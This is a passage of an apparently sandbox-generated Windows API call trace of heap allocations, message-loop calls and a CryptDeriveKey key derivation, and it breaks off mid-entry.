[0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0130.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0130.345] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0130.345] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0130.346] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0130.346] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0130.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0130.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0130.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0130.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0130.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0130.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0130.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.347] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0130.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0130.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0130.349] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.349] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0130.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0130.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0130.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0130.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0130.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0130.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0130.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.355] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0130.355] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f90, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87550) returned 1 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0130.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0130.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0130.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0130.358] RtlAllocateHeap 